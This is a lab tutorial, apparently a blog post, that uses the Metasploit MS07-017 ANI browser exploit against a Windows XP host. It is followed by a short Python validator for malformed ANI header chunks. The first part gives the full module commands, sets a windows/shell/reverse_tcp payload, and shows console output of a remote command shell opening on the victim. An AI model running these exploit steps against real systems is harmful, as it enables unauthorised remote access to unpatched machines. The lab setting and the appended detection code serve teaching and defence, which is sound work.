Using msf payloads


I. Passive Exploit (browser-based attack)

Environment:

Kali: 10.0.0.132

Windows XP: 10.0.0.106

1. Create the payload

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize 
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 10.0.0.132
SRVHOST => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lhost 10.0.0.132
lhost => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.0.0.132       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.132       yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista


msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.0.132:4444 
[*] Using URL: http://10.0.0.132:80/
[*] Server started.
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >

2. Visit the URL (http://10.0.0.132:80/) from the Windows XP machine

3. Check Kali

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending HTML page
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.106
[*] Command shell session 1 opened (10.0.0.132:4444 -> 10.0.0.106:1069) at 2019-05-07 10:00:18 +0800

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               10.0.0.132:4444 -> 10.0.0.106:1069 (10.0.0.106)

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\??>ipconfig 
ipconfig 

Windows IP Configuration


Ethernet adapter 本地连接

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.0.0.106
        Subnet Mask . . . . . . . . . . . : 255.0.0.0
        Default Gateway . . . . . . . . . : 10.0.0.254

Ethernet adapter Bluetooth 网络连接

        Media State . . . . . . . . . . . : Media disconnected

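The module used above delivers a Windows ANI (animated cursor) file whose "anih" header chunk declares a size other than the 36 bytes of the ANIHEADER structure; unpatched LoadAniIcon() trusted that declared size when copying into its fixed-size stack buffer. The following added example (not part of the original post) is a small defender-side RIFF/ANI chunk walker that flags such chunks; the ANI byte strings it builds are constructed for the demo, not captured traffic.

```python
"""Added example: flag ANI files whose 'anih' chunk size is not 36 bytes
(the malformed header behind MS07-017). Sample inputs are constructed."""
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): nine DWORD fields


def riff_chunks(data):
    """Yield (fourcc, body_offset, declared_size) for every chunk in a
    RIFF/ACON stream, descending into LIST chunks so nested chunks are seen."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise ValueError("not a RIFF ACON (ANI) stream")
    yield from _walk(data, 12, len(data))


def _walk(data, pos, end):
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        body = pos + 8
        yield fourcc, body, size
        if fourcc == b"LIST":
            # LIST body = 4-byte list type followed by sub-chunks
            yield from _walk(data, body + 4, min(body + size, end))
        pos = body + size + (size & 1)  # RIFF pads odd-sized chunks to even


def find_bad_anih(data):
    """Return [(offset, declared_size)] for every anih chunk whose size != 36."""
    return [(off, size) for fourcc, off, size in riff_chunks(data)
            if fourcc == b"anih" and size != ANIH_SIZE]


def make_ani(anih_size):
    """Build a constructed ANI stream containing one zero-filled anih chunk
    with the given declared size (36 = well-formed, anything else = malformed)."""
    anih = b"anih" + struct.pack("<I", anih_size) + bytes(anih_size)
    body = b"ACON" + anih
    return b"RIFF" + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    print(find_bad_anih(make_ani(36)))  # [] -> header size is valid
    print(find_bad_anih(make_ani(80)))  # [(20, 80)] -> flagged
```

The same check can be run over any .ani attachment or HTTP response body before it reaches an unpatched client; a declared anih size larger than the remaining file is equally suspicious.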